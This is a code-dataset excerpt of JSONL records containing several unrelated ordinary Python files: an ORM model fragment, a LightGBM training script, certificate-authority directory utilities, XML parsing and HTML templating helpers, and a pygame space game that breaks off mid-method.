__conn.rollback()\n print(\"执行失败: \",e)\n print(sql)\n res = {'state':False,'msg':e}\n finally :\n # 关闭\n if __cs!=None : __cs.close()\n # 关闭链接\n if not Model.__rollback and __conn!=None : __conn.close()\n return res\n\n # 验证&取值\n def __getAllFields(self):\n self.__fields = {}\n methods = dir(self)\n fields = self.__setFields()\n for name in fields.keys():\n mName = name.capitalize()\n val = fields[name]\n val = '\"%s\"'%str(val) if type(val)==str else str(val)\n # 设置\n if 'set'+mName in methods: exec('self.set'+mName+'('+val+')')\n # 获取\n if 'get'+mName in methods: self.__fields[name]=eval('self.get'+mName+'()')\n else : self.__fields[name] = fields[name]\n # 获取-字段&值\n def __setFields(self) :\n arr = self.__dict__\n fields = {}\n for key in arr.keys():\n if key[1] != 'M': fields[key]=arr[key]\n return fields\n # 回调函数\n def __callback(self,name):\n methods = dir(self)\n if name in methods : self.__fields=eval('self.'+name+'()')\n","sub_path":"python/app/model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307975507","text":"#!bin/usr/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef rectangle_rule(func,intervall_start,intervall_end,stepsize):\n sum = 0\n x_t = 0\n xs = [x_t]\n integral_t = 0\n for i in range(intervall_start,intervall_end):\n integral_delta_t = stepsize*func(intervall_start+i)\n x_t += integral_t + integral_delta_t\n integral_t = integral_delta_t\n xs.append(x_t)\n return xs\n\n\ndef f(t):\n return 0.5*(200*np.exp(-0.5*t))-0.3*(200*(0.5/(0.5-0.3))*(np.exp(-0.3*t)-np.exp(-0.5*t)))\n\ndef save_to_txt(states,times,path):\n with open(path,\"w\") as output:\n output.write(\",\".join([str(time) for time in times]))\n output.write(\"\\n\")\n output.write(\",\".join([str(round(state,2)) for state in states]))\n\n\n\ndef main():\n stepsize = 1\n intervall_start = 0\n intervall_end = 24\n xs = rectangle_rule(f,intervall_start,intervall_end,stepsize)\n real_xs = [(200*(0.5/(0.5-0.3))*(np.exp(-0.3*t)-np.exp(-0.5*t))) for t in range(0,intervall_end)]\n save_to_txt(xs,range(intervall_start,intervall_end),\"Exc6Task3a.txt\")\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"task6/Exc6task3a.py","file_name":"Exc6task3a.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"918840","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright (c) 2018-2021 Kairo de Araujo\n\"\"\"\n\nfrom glob import glob\nimport os\nimport re\n\nfrom ._constants import (\n CA_CERT,\n CA_CERTS_DIR,\n CA_CSR,\n CA_CRL,\n CA_KEY,\n CA_PUBLIC_KEY,\n CA_PRIVATE_DIR,\n HOSTNAME_REGEX,\n)\nfrom .exceptions import OwnCAIntermediate\n\n\ndef file_data_status(ca_status):\n \"\"\"\n Verify the CA status based in the existent files.\n\n :param ca_status: current ``ca_status`` file dictionary:\n ``ownca.utils.ownca_directory``\n :type ca_status: dict, required\n\n :return: True, False or None\n :rtype: bool/None\n \"\"\"\n key = ca_status.get(\"key\")\n cert = ca_status.get(\"certificate\")\n csr = ca_status.get(\"csr\")\n\n # this check if the CA has the key and certificates files in disk\n # if both are true, means the health status is True\n if key == cert and key is True:\n return True\n\n # if certificate and key does not match and one of then are True, is not ok\n elif key != cert and key or cert:\n if csr:\n raise OwnCAIntermediate(\"Intermediate CA Missing the certificate.\")\n\n return False\n\n # in that case, the system has not a CA configured.\n else:\n return None\n\n\ndef _create_ownca_dir(ownca_dir):\n \"\"\"\n Creates the CA directory.\n\n :param ownca_dir: :string: full path directory for ownca\n :return: bool\n \"\"\"\n try:\n if not os.path.isdir(ownca_dir):\n os.mkdir(ownca_dir)\n\n except (FileExistsError, OSError, FileNotFoundError) as err:\n raise err\n\n\ndef ownca_directory(ca_storage):\n \"\"\"\n Validates and manage CA storage directory and subfolders structure files.\n\n :param ca_storage: CA storage\n :type ca_storage: string, required\n :return: dict with state of ownca storage files\n :rtype: dict\n\n .. highlight:: python\n .. code-block:: python\n\n {\n \"certificate\": bool,\n \"crl\": bool,\n \"key\": bool,\n \"public_key\": bool,\n \"ca_home\": None or str,\n }\n\n \"\"\"\n if \"CA_test\".lower() in ca_storage.lower() and not os.getenv(\"TEST_MODE\"):\n raise ValueError(\n f\"Not allowed {ca_storage}. Please do not use a name that \"\n + \"contains 'ca_test'\"\n )\n\n ownca_status = {\n \"type\": \"Certificate Authority\",\n \"ca_home\": None,\n \"certificate\": False,\n \"crl\": False,\n \"csr\": False,\n \"key\": False,\n \"public_key\": False,\n }\n\n if not os.path.isdir(ca_storage):\n os.mkdir(ca_storage)\n\n ownca_subdirs = [CA_CERTS_DIR, CA_PRIVATE_DIR]\n current_subdirs = glob(f\"{ca_storage}/*\")\n\n for ownca_subdir in ownca_subdirs:\n ca_storage_sub_dir = os.path.join(ca_storage, ownca_subdir)\n if ca_storage_sub_dir not in current_subdirs:\n ownca_status[\"ca_home\"] = \"Inconsistent!\"\n _create_ownca_dir(ca_storage_sub_dir)\n\n ownca_status[\"ca_home\"] = ca_storage\n\n if os.path.isfile(os.path.join(ca_storage, CA_CERT)):\n ownca_status[\"certificate\"] = True\n\n if os.path.isfile(os.path.join(ca_storage, CA_CSR)):\n ownca_status[\"csr\"] = True\n ownca_status[\"type\"] = \"Intermediate Certificate Authority\"\n\n if os.path.isfile(os.path.join(ca_storage, CA_CRL)):\n ownca_status[\"crl\"] = True\n\n if os.path.isfile(os.path.join(ca_storage, CA_KEY)):\n ownca_status[\"key\"] = True\n\n if os.path.isfile(os.path.join(ca_storage, CA_PUBLIC_KEY)):\n ownca_status[\"public_key\"] = True\n\n return ownca_status\n\n\ndef store_file(file_data, file_path, permission=None, force=False):\n \"\"\"\n Stores (write) files in the storage\n\n :param file_data: the file data\n :type file_data: str, required\n :param file_path: the file absolute path\n :type file_path: str, required\n :param permission: operating-system mode bitfield\n :type permission: int, optional\n :return: bool\n :rtype: boolean\n \"\"\"\n if os.path.isfile(file_path) and force is False:\n raise FileExistsError(f\"{file_path} already exists.\")\n\n try:\n with open(file_path, \"w\") as f:\n f.write(file_data.decode(\"utf-8\"))\n\n if permission:\n os.chmod(file_path, permission)\n\n except OSError as err:\n raise err\n\n return True\n\n\ndef validate_hostname(hostname):\n \"\"\"\n Validates if the hostname follows the common Internet rules for FQDN\n\n :param hostname: string hostname\n :type hostname: sting, required\n :return: bool\n :rtype: bool\n \"\"\"\n\n if type(hostname) is not str:\n return False\n\n if len(hostname) < 1 or len(hostname) > 253:\n return False\n\n ldh_re = re.compile(f\"{HOSTNAME_REGEX}\", re.IGNORECASE)\n\n return all(ldh_re.match(x) for x in hostname.split(\".\"))\n","sub_path":"ownca/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641746139","text":"class Item:\n def __init__(self,name,description,pick_up=False):\n self.name=name\n self.description=description\n self.pick_up=pick_up\n def is_taken(self,item):\n if self.pick_up==True:\n print(f'You have picked up {item.name}')\n else:\n print(f'You have dropped {item.name}')\n \n\n ","sub_path":"src/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"95174229","text":"import lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\n\ndf_train = pd.read_csv('train.csv')\ndf_train.loc[:, 'DistanceToFirstStop_p20':'DistanceToFirstStop_p80'] = np.around(\n df_train.loc[:, 'DistanceToFirstStop_p20':'DistanceToFirstStop_p80'])\ndf_test = pd.read_csv('test.csv')\n\n\n# calculate angle.\ndef getAngle(df_train):\n angleValue = {'N': 0, 'NE': 45, 'E': 90, 'SE': 135, 'S': 180, 'SW': 225, 'W': 270, 'NW': 315}\n a = df_train['EntryHeading']\n b = df_train['ExitHeading']\n angle = abs(angleValue[b] - angleValue[a])\n if angle > 180:\n angle -= 180\n return angle\n\n\ndf_train['angle'] = df_train.apply(getAngle, axis=1)\n\ndata = pd.get_dummies(df_train, columns=['Hour', 'Weekend', 'Month', 'City', 'angle'])\ndata = data.drop(\n ['RowId', 'IntersectionId', 'Latitude', 'Longitude', 'EntryStreetName', 'ExitStreetName', 'EntryHeading',\n 'ExitHeading', 'Path'], axis=1)\n\ny = np.array(data.loc[:, 'DistanceToFirstStop_p50'])\nx = np.array(data.loc[:, 'Hour_0': 'angle_180'])\n\ndf_test['angle'] = df_test.apply(getAngle, axis=1)\ndata1 = pd.get_dummies(df_test, columns=['Hour', 'Weekend', 'Month', 'City', 'angle'])\ndata1 = data1.drop(\n ['RowId', 'IntersectionId', 'Latitude', 'Longitude', 'EntryStreetName', 'ExitStreetName', 'EntryHeading',\n 'ExitHeading', 'Path'], axis=1)\n\nx1 = np.array(data1.loc[:, 'Hour_0': 'angle_180'])\n\n# https://github.com/apachecn/lightgbm-doc-zh.\n# Divide training set and validation set.\nxTrainAll, xPredict, yTrainAll, yPredict = train_test_split(x, y, test_size=0.10, random_state=100)\nxTrain, xTest, yTrain, yTest = train_test_split(xTrainAll, yTrainAll, test_size=0.2, random_state=100)\ntrain_data = lgb.Dataset(data=xTrain, label=yTrain)\ntest_data = lgb.Dataset(data=xTest, label=yTest)\n\n# Set parameters of the model.\nparam = {'num_leaves': 31, 'num_trees': 100, 'objective': 'regression'}\nparam['metric'] = 'RMSE'\n\n# Train the model based on the training dataset.\n# Set early stopping rounds for the model.\nnum_round = 100\nmodel = lgb.train(param, train_data, num_round, valid_sets=[test_data], early_stopping_rounds=100)\n\n# Save the model.\nmodel.save_model('model.txt', num_iteration=model.best_iteration)\n\n# Conduct cross-validation for the model.\nlgb.cv(param, train_data, num_round, nfold=5, early_stopping_rounds=100)\n\n# Predict the validation dataset based on the established model.\npredictions = model.predict(xPredict, num_iteration=model.best_iteration)\n\n# Compute the root mean squared error(RMSE) to evaluate the effect of the model.\nRMSE = np.sqrt(mean_squared_error(yPredict, predictions))\nprint(\"RMSE of predict :\", RMSE)\n\n# A saved model can be loaded and predict the test data file.\nbst = lgb.Booster(model_file='model.txt') # init model\npred = bst.predict(x1, num_iteration=bst.best_iteration)\n\n\n\n\n\n\n\n\n","sub_path":"LightGBM.py","file_name":"LightGBM.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479413080","text":"# coding:utf-8\nimport os\nimport re\nimport time\nimport xml\nimport xml.etree.ElementTree as ET\n# 全局唯一标识\nunique_id = 1\n\n# 遍历所有的节点\ndef walkData(root_node, level, result_list):\n global unique_id\n #temp_list = [unique_id, level, root_node.tag, root_node.text, root_node.attrib]\n #result_list.append(temp_list)\n if (len(root_node.tag) == 8)and (root_node.tag.startswith(\"P\")):\n temp_list = [root_node.tag, root_node.text]\n result_list.append(temp_list)\n\n # 遍历每个子节点\n children_node = root_node.getchildren()\n if len(children_node) == 0:\n return\n for child in children_node:\n walkData(child, level + 1, result_list)\n return\n\n\ndef getXmlData(file_name):\n level = 1 # 节点的深度从1开始\n result_list = []\n root = ET.parse(file_name).getroot()\n walkData(root, level, result_list)\n\n return result_list\n\ndef generationHtmlTemplate(htmlFilePath, newFilePath, result_list):\n # 更新html文件\n htmlFile = open(htmlFilePath, 'r', encoding='utf-8')\n newHtmlFile = open(newFilePath, 'w', encoding='utf-8')\n for line in htmlFile:\n for item in result_list:\n findStr = '>' + item[1] + '<'\n newStr = '{' + item[0] + '}'\n if findStr in line:\n newline = line.replace(item[1], newStr, 1)\n line = newline\n result_list.remove(item)\n break\n newHtmlFile.write(line)\n htmlFile.close()\n newHtmlFile.close()\n\ndef isVaildDate(date):\n try:\n time.strptime(date, \"%Y-%m-%dT%H:%M:%S.000+08:00\")\n return True\n except:\n return False\n\ndef is_number(str):\n try:\n float(str)\n return True\n except ValueError:\n return False\n\ndef intcomma(value):\n orig = str(value)\n new = re.sub(\"^(-?\\d+)(\\d{3})\", '\\g<1>,\\g<2>', orig)\n if orig == new:\n return new\n else:\n return intcomma(new)\n\ndef dateInfoTransform(result_list):\n for item in result_list:\n if isVaildDate(item[1]):\n newDateStr = item[1].replace('-', '.', 3)\n dateList = newDateStr.split('T')\n newDateStr = dateList[0]\n item[1] = newDateStr\n elif is_number(item[1]):\n if item[0].endswith(('J01','J02','J03','J04','J05')):\n newMoneyStr = intcomma(item[1])\n item[1] = newMoneyStr\n\nif __name__ == '__main__':\n #读取xml文件\n file_name = \"F:/Code/pythonTest/testFile/王小二.xml\"\n result_list = getXmlData(file_name)\n dateInfoTransform(result_list)\n\n htmlPath = 'F:/Code/pythonTest/testFile/王二小报告全集.html'\n generationPath = './template.html'\n os.path.exists(generationPath)\n os.remove(generationPath)\n generationHtmlTemplate(htmlPath, generationPath, result_list)\n # f = open('./output.txt', 'a')\n # for item in result_list:\n # f.write('\\n' + str(item))\n # f.close()\n # pass\n","sub_path":"xmlToHtml/readXml.py","file_name":"readXml.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487670502","text":"# -*- coding: UTF-8 -*-\r\nimport xml.etree.ElementTree as ET\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\ndef get_dir_list(path):\r\n\r\n #res 为保存xml结果的字典,首先将其置为空\r\n res = {}\r\n\r\n #构建ETree\r\n webxml= ET.parse(path)\r\n\r\n #找到所有的网站名称\r\n web_names=webxml.findall('web_name')\r\n\r\n #测试打印每个网站的信息\r\n #print web_names\r\n\r\n #去找每一个网站的所有信息\r\n for web_name in web_names:\r\n\r\n #打印每一个网站的名称\r\n #print web_name.attrib['name']\r\n #得到网站的名称,并将其设为key, value设为空(后面信息收集完毕后再添加value)\r\n key = web_name.attrib['name']\r\n res[key]=''\r\n\r\n #value 也是一个字典,初值为空\r\n key_value = {}\r\n\r\n #找到该网站的各个列表分类,web_lis为一个列表\r\n web_lis = web_name.getchildren()\r\n\r\n #循环一下\r\n for web_li in web_lis:\r\n\r\n #找到每一个分类的名称\r\n #print web_li.attrib['name']\r\n web_li_name = web_li.attrib['name']\r\n\r\n #同样将其加入主字典value的键中\r\n key_value[web_li_name]=''\r\n\r\n #找到在网页中爬去该分类需要的url及其节点的属性 和 爬取详情的url及其节点的属性\r\n all_attrs = web_li.getchildren()\r\n #打印测试一下\r\n #print all_attrs\r\n value_dir={}\r\n #找到xml文件中的该网站在这个分类上的各个重要信息\r\n for all_attr in all_attrs:\r\n #print all_attr\r\n\r\n #网页前缀\r\n if(all_attr.attrib['name']==\"start_pattrern\"):\r\n #打印测试\r\n #print \"网址前缀:\"+all_attr.text\r\n #将其计入字典中\r\n value_dir['start_pattrern']=all_attr.text\r\n\r\n #网页后缀\r\n if(all_attr.attrib['name']==\"end_pattrern\"):\r\n #print \"网址后缀:\"+all_attr.text\r\n value_dir['end_pattrern']=all_attr.text\r\n\r\n #需要爬取得网页数\r\n if(all_attr.attrib['name']==\"page_num\"):\r\n #print \"构造页数:\"+all_attr.text\r\n value_dir['page_num']=all_attr.text\r\n\r\n #第一页是否需要特殊处理\r\n if(all_attr.attrib['name']==\"special\"):\r\n if(all_attr.attrib['id']==\"0\"):\r\n #print \"无需特殊处理\"\r\n key_value['special']='0'\r\n key_value['special_char']=\"\"\r\n else:\r\n #print \"需要特殊处理——处理符号为:\"+all_attr.text\r\n key_value['special']='1'\r\n key_value['special_char']=all_attr.text\r\n\r\n\r\n #当节点为列表的属性时,其属性为一个字典\r\n li_attr_dir = {}\r\n if(all_attr.attrib['name']==\"li_attr\"):\r\n li_attrs = all_attr.getchildren()\r\n for li_attr in li_attrs:\r\n #print \"需要抓取列表url的属性为\"+li_attr.attrib['name']+ \"=\" +li_attr.text\r\n li_attr_dir[li_attr.attrib['name']]=li_attr.text\r\n\r\n\r\n #将一个字典赋给li_attr 这个住键\r\n key_value['li_attr']=li_attr_dir\r\n\r\n\r\n if(all_attr.attrib['name']==\"filename\"):\r\n # 测试\r\n #print \"需要保存的文件名:\"+all_attr.attrib['save']\r\n key_value['save_file_name']=all_attr.attrib['save']\r\n\r\n article_attrs = all_attr.getchildren()\r\n for article_attr in article_attrs:\r\n article_dir={}\r\n #print article_attr.attrib['name']+ \":\" + article_attr.getchildren()[0].attrib['name']+\"=\"+article_attr.getchildren()[0].text\r\n article_dir[ article_attr.getchildren()[0].attrib['name']]=article_attr.getchildren()[0].text\r\n key_value[article_attr.attrib['name']]=article_dir\r\n\r\n key_value[web_li_name]=value_dir\r\n res[key]=key_value\r\n return res\r\n\r\n","sub_path":"dir_list.py","file_name":"dir_list.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8697508","text":"\n\nclass Service:\n\tsecret=\"Yongu has two\"\n\tdef setname(self,name):\n\t\tself.name=name\n\tdef sum(self,a,b):\n\t\tresult=a+b\n\t\tprint(\"%s nim %s + %s = %s \"%(self.name,a,b,result))\n\na=Service()\na.setname(\"Changheon Lee\")\na.sum(5,6)\n","sub_path":"language/python/class/clss.py","file_name":"clss.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432957573","text":"import pygame, sys, math, random, textwrap\r\nfrom pygame.locals import *\r\nfrom physics import vector, vecSum, vecDif, multSc, vecMag, unitVec, gravityField\r\n\r\n# set color constants\r\n# R G B\r\nGRAY = (100, 100, 100)\r\nNAVYBLUE = ( 60, 60, 100)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0,0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nORANGE = (255, 128, 0)\r\nPURPLE = (255, 0, 255)\r\nCYAN = (0, 255, 255)\r\nBLACK = (0, 0, 0)\r\n\r\ntrajColor=Color(0, 255, 0, 10)\r\nbuttonTextColor=Color(0, 80, 255, 255)\r\nfadedPurpleColor=Color(189, 164, 189, 255)\r\ntitleColor=Color(179, 31, 15, 255)\r\n\r\n\r\nFPS = 30\r\nWINDOWWIDTH = 800 # size of window width in pixels\r\nWINDOWHEIGHT = 600 # size of window height in pixels\r\n\r\n#time constant\r\ndeltaT=1\r\n\r\n#ship engine power\r\nengine=0.2\r\n\r\n#ship's 1 divided by rotational inertia momentum\r\nrotIner=0.2\r\n\r\n#ship rotation speed\r\nrotSpeed=0.1\r\n\r\n#ratio to convert radians to degrees\r\nradDegRatio=180/math.pi\r\n\r\n#sides of of the ship\r\nshipHeight = 32\r\nshipWidth = 16\r\n\r\n#sides of the foe's rockets\r\nrocketHeight=8\r\nrocketWidth=4\r\n\r\n#speed of plasma shots of foe planets\r\nplasmaSpeed=2.0\r\n\r\n#max speed of asteroids inside catcher\r\nmaxInCatcherSpeed=5.0\r\n\r\n#speed of catcher's push\r\nspeedCatcherPush=5.0\r\n\r\n#fuel consumption parameters\r\nengineConsumption=0.05\r\nshuntingEngineConsumption=0.005\r\nnavigateConsumption=0.02\r\n\r\n#load last level\r\nf=open(\"currentLevel\", \"r\")\r\nline=f.readline().rstrip()\r\ncurrentLevelNumber=int(line)\r\nf.close()\r\n\r\n# display settings initiation\r\nglobal FPSCLOCK, DISPLAYSURF\r\npygame.init()\r\nFPSCLOCK = pygame.time.Clock()\r\nmyfont = pygame.font.SysFont(\"arial\", 15)\r\nbigFont = pygame.font.SysFont(\"arial\", 20, True)\r\nsmallFont=pygame.font.SysFont(\"monospace\", 10)\r\nhugeFont=pygame.font.SysFont(\"impact\", 40)\r\n\r\nDISPLAYSURF = pygame.display.set_mode ((WINDOWWIDTH, WINDOWHEIGHT))\r\npygame.display.set_caption('Space adventures', 'Space adventures')\r\n\r\n#download images\r\nplayerImg= pygame.image.load('images/rocket.png').convert_alpha()\r\nmainEngineImg= pygame.image.load('images/rocketMainEngine.png').convert_alpha()\r\nrightShuntingEngineImg= pygame.image.load('images/rocketRightEngine.png').convert_alpha()\r\nleftShuntingEngineImg= pygame.image.load('images/rocketLeftEngine.png').convert_alpha()\r\nleftRightShuntingEngineImg= pygame.image.load('images/rocketLeftRightEngine.png').convert_alpha()\r\nmainLeftShuntingEngineImg= pygame.image.load('images/rocketMainLeftEngine.png').convert_alpha()\r\nmainRightShuntingEngineImg= pygame.image.load('images/rocketMainRightEngine.png').convert_alpha()\r\nmainLeftRightShuntingEngineImg=pygame.image.load('images/rocketMainLeftRightEngine.png').convert_alpha()\r\nneutPlanetImg=pygame.image.load('images/neutPlanet.png').convert_alpha()\r\nfrPlanetImg=pygame.image.load('images/frPlanet.png').convert_alpha()\r\nfoePlanetImg=pygame.image.load('images/foePlanet.png').convert_alpha()\r\nrocketImg=pygame.image.load('images/foeRocket.png').convert_alpha()\r\nmineralImg=pygame.image.load('images/mineral.png').convert_alpha()\r\nasteroidImg=pygame.image.load('images/asteroid.png').convert_alpha()\r\nasteroidTailImg=pygame.image.load('images/asteroidTail.png').convert_alpha()\r\nstartImg=pygame.image.load('images/start.png').convert_alpha()\r\nfinishImg=pygame.image.load('images/finish.png').convert_alpha()\r\nfinishActiveImg=pygame.image.load('images/finishActive.png').convert_alpha()\r\nbackground=pygame.image.load('images/background.png').convert_alpha()\r\nmenuBackground=pygame.image.load('images/menu.png').convert_alpha()\r\nbuttonImg=pygame.image.load('images/button20040.png').convert_alpha()\r\nbuttonPressedImg=pygame.image.load('images/buttonPressed20040.png').convert_alpha()\r\nhelpPageImg=pygame.image.load('images/helpPage.png').convert_alpha()\r\nmainMenuImg=pygame.image.load('images/mainMenuPicture.png').convert_alpha()\r\n#download explosion\r\nexplosions=[]\r\nexplosion1=pygame.image.load('images/explosion1.png').convert_alpha()\r\nexplosions.append(explosion1)\r\nexplosion2=pygame.image.load('images/explosion2.png').convert_alpha()\r\nexplosions.append(explosion2)\r\nexplosion3=pygame.image.load('images/explosion3.png').convert_alpha()\r\nexplosions.append(explosion3)\r\nexplosion4=pygame.image.load('images/explosion4.png').convert_alpha()\r\nexplosions.append(explosion4)\r\nexplosion5=pygame.image.load('images/explosion5.png').convert_alpha()\r\nexplosions.append(explosion5)\r\nexplosion6=pygame.image.load('images/explosion6.png').convert_alpha()\r\nexplosions.append(explosion6)\r\n#download ship's explosion\r\nshipExplosion=[]\r\nexplosion1=pygame.image.load('images/rocketExplosion1.png').convert_alpha()\r\nshipExplosion.append(explosion1)\r\nexplosion2=pygame.image.load('images/rocketExplosion2.png').convert_alpha()\r\nshipExplosion.append(explosion2)\r\nexplosion3=pygame.image.load('images/rocketExplosion3.png').convert_alpha()\r\nshipExplosion.append(explosion3)\r\nexplosion4=pygame.image.load('images/rocketExplosion4.png').convert_alpha()\r\nshipExplosion.append(explosion4)\r\nexplosion5=pygame.image.load('images/rocketExplosion5.png').convert_alpha()\r\nshipExplosion.append(explosion5)\r\nexplosion6=pygame.image.load('images/rocketExplosion6.png').convert_alpha()\r\nshipExplosion.append(explosion6)\r\n#download finish animation\r\nfinishAnimation=[]\r\nanimation1=pygame.image.load('images/finishAnim1.png').convert_alpha()\r\nfinishAnimation.append(animation1)\r\nanimation2=pygame.image.load('images/finishAnim2.png').convert_alpha()\r\nfinishAnimation.append(animation2)\r\nanimation3=pygame.image.load('images/finishAnim3.png').convert_alpha()\r\nfinishAnimation.append(animation3)\r\nanimation4=pygame.image.load('images/finishAnim4.png').convert_alpha()\r\nfinishAnimation.append(animation4)\r\nanimation5=pygame.image.load('images/finishAnim5.png').convert_alpha()\r\nfinishAnimation.append(animation5)\r\nanimation6=pygame.image.load('images/finishAnim6.png').convert_alpha()\r\nfinishAnimation.append(animation6)\r\n#download sounds\r\nshipExplosionSound=pygame.mixer.Sound(\"sounds/ShipExplosion.wav\")\r\nfinishSound=pygame.mixer.Sound(\"sounds/Sound.wav\")\r\nbuttonSound=pygame.mixer.Sound(\"souns/Sound.wav\")\r\nengineSound=pygame.mixer.Sound(\"sounds/Sound.wav\")\r\n\r\nclass battleShip(pygame.sprite.Sprite):\r\n def __init__(self, position=vector((0,0))): #take position as a vector in input\r\n pygame.sprite.Sprite.__init__(self)\r\n # defines initial position and characterictics of the battle ship\r\n self.position=position\r\n self.speed=vector((0, 0))\r\n self.acc=vector((0, 0))\r\n self.onOrbit=False\r\n self.trajectory=[]\r\n self.alive=True\r\n self.catcherRadius=20\r\n self.catcherOn=False\r\n self.asteroidCaught=None\r\n self.speedDelta=vector((0, 0))\r\n self.angleDelta=0.0\r\n self.mainEngine=False\r\n self.leftShuntingEngine=False\r\n self.rightShuntingEngine=False\r\n self.changeTrajectory=True\r\n self.mineralCount=0\r\n self.fuel=10\r\n self.explosionFramesCount=0\r\n self.finishFramesCount=0\r\n self.finish=False\r\n\r\n # defines initial rotation characteristics of battle ship\r\n # all angular measures are in radians\r\n self.angle=float(0)\r\n # intitial rotation\r\n self.Surf = pygame.Surface((shipWidth, shipHeight))\r\n self.Surf.blit(playerImg, (0,0))\r\n self.rotSurf = pygame.transform.rotate(self.Surf, math.degrees(self.angle)-90)\r\n self.rotSurf.set_colorkey(BLACK) \r\n \r\n self.image=self.rotSurf\r\n self.rect=self.rotSurf.get_rect().move(self.position.x-self.rotSurf.get_rect().width/2, self.position.y-self.rotSurf.get_rect().height/2)\r\n self.mask=pygame.mask.from_surface(self.Surf) #create mask for collision\r\n\r\n #calculate coordintes of asteroid catcher\r\n self.catcherCenter=vecSum(vector((math.cos(self.angle)*(shipHeight/2.0+self.catcherRadius), -math.sin(self.angle)*(shipHeight/2.0+self.catcherRadius))), self.position)\r\n\r\n def update(self, force, asteroidBelt):\r\n if self.alive and not self.finish:\r\n if self.onOrbit==False:\r\n #update decartes position\r\n # first update position, then - speed and finally - acceleration\r\n self.position=vecSum(self.position,vecSum(multSc(deltaT, self.speed), multSc(math.pow(deltaT, 2)/2, force)))\r\n self.speed=vecSum(self.speed, vecSum(self.speedDelta, multSc(deltaT,force)))\r\n self.acc=force \r\n #update rotation\r\n # first update angle, then rotation\r\n self.angle+=deltaT*self.angleDelta\r\n if self.angle>(2*math.pi): self.angle=self.angle%(2*math.pi)\r\n else:\r\n #when ship moves on friendly's planet orbit speed and rotation are used in absolute terms\r\n self.position=vecSum(self.position, multSc(deltaT, self.speedDelta))\r\n self.speed=self.speedDelta\r\n self.angle+=deltaT*self.angleDelta\r\n if self.angle>(2*math.pi): self.angle=self.angle%(2*math.pi)\r\n\r\n #calculate caught asteroids movements and asteroid catch\r\n\r\n if self.asteroidCaught!=None and self.catcherOn==True:\r\n self.asteroidCatch(self.asteroidCaught)\r\n elif self.asteroidCaught!=None and self.catcherOn==False:\r\n self.asteroidPush(self.asteroidCaught)\r\n self.asteroidCaught=None\r\n elif self.asteroidCaught==None and self.catcherOn==True:\r\n distanceToNearest=self.catcherRadius\r\n for i in asteroidBelt:\r\n if vecMag(vecDif(self.catcherCenter, i.position))=FPS:\r\n pygame.sprite.Sprite.kill(self)\r\n #if player finished the level launch finish animation\r\n elif self.finish:\r\n animationFrames=5\r\n numberOfPicture=self.finishFramesCount//animationFrames\r\n self.Surf.fill(BLACK)\r\n self.Surf.blit(finishAnimation[numberOfPicture], (0, 0))\r\n self.Surf.set_colorkey(BLACK)\r\n self.image=self.Surf\r\n self.rect=self.Surf.get_rect().move(self.position.x-self.Surf.get_rect().width/2, self.position.y-self.Surf.get_rect().height/2)\r\n self.finishFramesCount+=1\r\n if self.finishFramesCount>=FPS:\r\n pygame.sprite.Sprite.kill(self)\r\n\r\n def asteroidCatch(self, other): \r\n #returns the speed to the catched object\r\n if self.catcherCenter==other.position:\r\n other.speed=self.speed\r\n elif vecMag(vecDif(self.catcherCenter, other.position))>maxInCatcherSpeed:\r\n speedDirection=multSc(1.0/vecMag(vecDif(self.catcherCenter, other.position)),vecDif(self.catcherCenter, other.position))\r\n other.speed=vecSum(self.speed, multSc(maxInCatcherSpeed, speedDirection))\r\n elif vecMag(vecDif(self.catcherCenter, other.position))<=maxInCatcherSpeed:\r\n other.speed=vecSum(self.speed, vecDif(self.catcherCenter, other.position))\r\n \r\n def asteroidPush(self, other):\r\n #catcher push in the direction of the player's ship with additional speed of speedCatcherPush in magnitude\r\n other.speed=multSc(speedCatcherPush, vector((math.cos(self.angle), -math.sin(self.angle)))) \r\n\r\n def engineFlames(self):\r\n # function is to add flames to ship image\r\n self.Surf = pygame.Surface((shipWidth, shipHeight))\r\n #self.Surf.blit(playerImg, (0, 0))\r\n if self.mainEngine==True:\r\n if self.leftShuntingEngine==True:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(mainLeftRightShuntingEngineImg, (0, 0))\r\n self.fuel-=(engineConsumption+2*shuntingEngineConsumption) \r\n else:\r\n self.Surf.blit(mainLeftShuntingEngineImg, (0, 0))\r\n self.fuel-=(engineConsumption+shuntingEngineConsumption)\r\n else:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(mainRightShuntingEngineImg, (0, 0))\r\n self.fuel-=(engineConsumption+shuntingEngineConsumption)\r\n else:\r\n self.Surf.blit(mainEngineImg, (0, 0))\r\n self.fuel-=engineConsumption \r\n else:\r\n if self.leftShuntingEngine==True:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(leftRightShuntingEngineImg, (0, 0))\r\n self.fuel-=2*shuntingEngineConsumption\r\n else:\r\n 